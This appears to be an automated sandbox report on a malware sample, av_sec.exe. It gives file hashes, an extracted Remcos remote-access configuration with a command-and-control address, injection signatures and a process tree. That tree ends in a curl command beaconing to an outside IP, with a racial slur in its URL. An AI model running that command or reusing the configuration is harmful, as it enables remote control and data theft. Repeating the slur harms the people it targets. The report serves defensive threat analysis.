Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
22-04-2024 11:41
Static task
static1
Behavioral task
behavioral1
Sample
av_sec.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
av_sec.exe
Resource
win10v2004-20240412-en
General
-
Target
av_sec.exe
-
Size
11.2MB
-
MD5
ab2c5633a45550670bca99f5cb82310c
-
SHA1
1b41983e38999ab3dcbad4a74cf2c7bf6ef9711e
-
SHA256
3bcf561a6a414a306a3196ca7174fd99b966faacb8f0ce4fae4bc72d32a4aebf
-
SHA512
80c7f67c87aebabbaef79828d5f269229d6218ba12abb8473e71c95d9fe9e967ca288c1dcb97d2d97f67946b9350923318e298c2d7a276b25877b2c092bc7ec9
-
SSDEEP
196608:cz97cMnvqx44EpYRPY4jTrcWrYdTjBI/TY0rA1q:k9wIvqx4xYRPYirxkZ6/j
Malware Config
Extracted
remcos
RemoteHost
178.33.57.155:443
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-PM1AI7
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Executes dropped EXE 2 IoCs
Processes:
RttHlp.exeRttHlp.exepid process 2604 RttHlp.exe 2792 RttHlp.exe -
Loads dropped DLL 6 IoCs
Processes:
RttHlp.exeRttHlp.exepid process 2604 RttHlp.exe 2604 RttHlp.exe 2604 RttHlp.exe 2604 RttHlp.exe 2792 RttHlp.exe 2792 RttHlp.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
RttHlp.exedescription pid process target process PID 2792 set thread context of 2732 2792 RttHlp.exe cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
av_sec.exeRttHlp.exeRttHlp.execmd.exepid process 2784 av_sec.exe 2784 av_sec.exe 2604 RttHlp.exe 2792 RttHlp.exe 2792 RttHlp.exe 2732 cmd.exe 2732 cmd.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
RttHlp.execmd.exepid process 2792 RttHlp.exe 2732 cmd.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
av_sec.exepid process 2784 av_sec.exe -
Suspicious use of WriteProcessMemory 27 IoCs
Processes:
av_sec.exeRttHlp.exeRttHlp.execmd.exeexplorer.exeWScript.exedescription pid process target process PID 2784 wrote to memory of 2604 2784 av_sec.exe RttHlp.exe PID 2784 wrote to memory of 2604 2784 av_sec.exe RttHlp.exe PID 2784 wrote to memory of 2604 2784 av_sec.exe RttHlp.exe PID 2784 wrote to memory of 2604 2784 av_sec.exe RttHlp.exe PID 2604 wrote to memory of 2792 2604 RttHlp.exe RttHlp.exe PID 2604 wrote to memory of 2792 2604 RttHlp.exe RttHlp.exe PID 2604 wrote to memory of 2792 2604 RttHlp.exe RttHlp.exe PID 2604 wrote to memory of 2792 2604 RttHlp.exe RttHlp.exe PID 2792 wrote to memory of 2732 2792 RttHlp.exe cmd.exe PID 2792 wrote to memory of 2732 2792 RttHlp.exe cmd.exe PID 2792 wrote to memory of 2732 2792 RttHlp.exe cmd.exe PID 2792 wrote to memory of 2732 2792 RttHlp.exe cmd.exe PID 2792 wrote to memory of 2732 2792 RttHlp.exe cmd.exe PID 2732 wrote to memory of 2360 2732 cmd.exe explorer.exe PID 2732 wrote to memory of 2360 2732 cmd.exe explorer.exe PID 2732 wrote to memory of 2360 2732 cmd.exe explorer.exe PID 2732 wrote to memory of 2360 2732 cmd.exe explorer.exe PID 2732 wrote to memory of 2360 2732 cmd.exe explorer.exe PID 2360 wrote to memory of 632 2360 explorer.exe WScript.exe PID 2360 wrote to memory of 632 2360 explorer.exe WScript.exe PID 2360 wrote to memory of 632 2360 explorer.exe WScript.exe PID 2360 wrote to memory of 632 2360 explorer.exe WScript.exe PID 632 wrote to memory of 884 632 WScript.exe cmd.exe PID 632 wrote to memory of 884 632 WScript.exe cmd.exe PID 632 wrote to memory of 884 632 WScript.exe cmd.exe PID 632 wrote to memory of 884 632 WScript.exe cmd.exe PID 2732 wrote to memory of 2360 2732 cmd.exe explorer.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\av_sec.exe"C:\Users\Admin\AppData\Local\Temp\av_sec.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2784 -
C:\Users\Admin\AppData\Local\Temp\Beaconserver4\RttHlp.exeC:\Users\Admin\AppData\Local\Temp\Beaconserver4\RttHlp.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2604 -
C:\Users\Admin\AppData\Roaming\Beaconserver4\RttHlp.exeC:\Users\Admin\AppData\Roaming\Beaconserver4\RttHlp.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2792 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2732 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe5⤵
- Suspicious use of WriteProcessMemory
PID:2360 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\check1.vbs"6⤵
- Suspicious use of WriteProcessMemory
PID:632 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c curl http://94.156.66.107:9000/hooks/nigger?id=QGTQZTRE7⤵PID:884
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5.5MB
MD5320634072eddd5b14ddddcf0e32d6608
SHA1d8db9bf00db95b25d2cd8b2c5888d250b535232b
SHA256bba6f76185241df9bf477ca6c815fb4914d000489ce84f54ed17eeda199a1714
SHA5128ea9e10a14de6f84041af79548a07936e84ececfdcab9c248aaab4bb80f1e387a6c421afb35e93c619698d6c93b5ebdace3b2f858910a74076c827d5e24971ff
-
Filesize
1.2MB
MD50dccfd326ca7456a9ac0c316bc4c7368
SHA19896864f2fb677eda555c325866bec7e5bf284ec
SHA256e66546f15a3ee8d6793d7cbada206f62e5d07e75b85030996ff793164756df06
SHA512b60fe1ab7d15f5d87673c747f35a4a8cd069538d4dcb979b0a98c89dc59aa68f355a8c53a5a712652e503ca00b87725ff149995b60f682292e56fe1c67153370
-
Filesize
1.0MB
MD540b9628354ef4e6ef3c87934575545f4
SHA18fb5da182dea64c842953bf72fc573a74adaa155
SHA256372b14fce2eb35b264f6d4aeef7987da56d951d3a09ef866cf55ed72763caa12
SHA51202b0ea82efbfbe2e7308f86bfbec7a5109f3fe91d42731812d2e46aebedce50aabc565d2da9d3fbcd0f46febbff49c534419d1a91e0c14d5a80f06b74888c641
-
Filesize
135KB
MD5a2d70fbab5181a509369d96b682fc641
SHA122afcdc180400c4d2b9e5a6db2b8a26bff54dd38
SHA2568aed681ad8d660257c10d2f0e85ae673184055a341901643f27afc38e5ef8473
SHA512219c6e7e88004fad9f4392be9a852c58fc43b7f6900e40370991427f37eaea5c18f48d2954f9479dde8bcb787345f4e292d5620add8224aec4d93d7968820b83
-
Filesize
11KB
MD56e4ffb2517b3570bf0c6766b8a0253fa
SHA12143b82dd1c8c3f4d0e0b146e65667a4e8552a9e
SHA256d690d10eac73dada021f73aa41e2e5f5f41d043ec3372512e138dc2f77623f41
SHA512d15317ea42fcb44a247f6300e33f14079e166b8a5bce285099b0ee21c68ce6ed753fcb8279956d27c94deabd28586fc142b1d4b3c852e0b181691dc55c58aa6f
-
Filesize
1.0MB
MD54b12739a07c02ef25a45d80516a87100
SHA1d976238dd9a697b7c35f85d3157282dfb68f4522
SHA256f003145b18b53ca237f3a0c1e7a21481c335467fe265474555dbc8e576d95fb6
SHA512f91ee89bd928d6880e4c58ffdfea47cd54e3ef38b50181e3717b7cc67ca0e03d764478a34ffccb7d2ddf72f85a1d2940729c79c8d727c960db615921974b7265
-
Filesize
1.1MB
MD5adf82ed333fb5567f8097c7235b0e17f
SHA1e6ccaf016fc45edcdadeb40da64c207ddb33859f
SHA256d6dd7a4f46f2cfde9c4eb9463b79d5ff90fc690da14672ba1da39708ee1b9b50
SHA5122253c7b51317a3b5734025b6c7639105dbc81c340703718d679a00c13d40dd74ccaba1f6d04b21ee440f19e82ba680aa4b2a6a75c618aed91bd85a132be9fc92
-
Filesize
1.9MB
MD595ecaf8770cb3d948f45588fc04e0dfd
SHA149890478b975dcbb7bac20e330d9498312583f85
SHA2565708ca3e0c822212494d2c4d51b2391904120cc5366adbc46e90fa9183d6b285
SHA51255fa8098cbbc1503e2603f7dee57173ce429f6f5da8a00b37c79744f6063d2c46918e993712f24a42857b6ff87092fa1b4dc7c8f40483930b596824a6ffcb2bc
-
Filesize
146B
MD585a2ebad40c21ba1da77230265b5351f
SHA1803822e08837ebda5de7dde963e4872ae2fc4c21
SHA256b5c409cbb25690b000d9d36c3b5170c1e61fff3d89bdaeadf0166ae28b0fdff9
SHA51277374eb3d9632c45c25c997380eab1ee338fbe659a24679b3cf28e76d67ffa71e2d2ea326181909d06970dca0e92b5528c1e7f9c866493162fd77170f87ea83a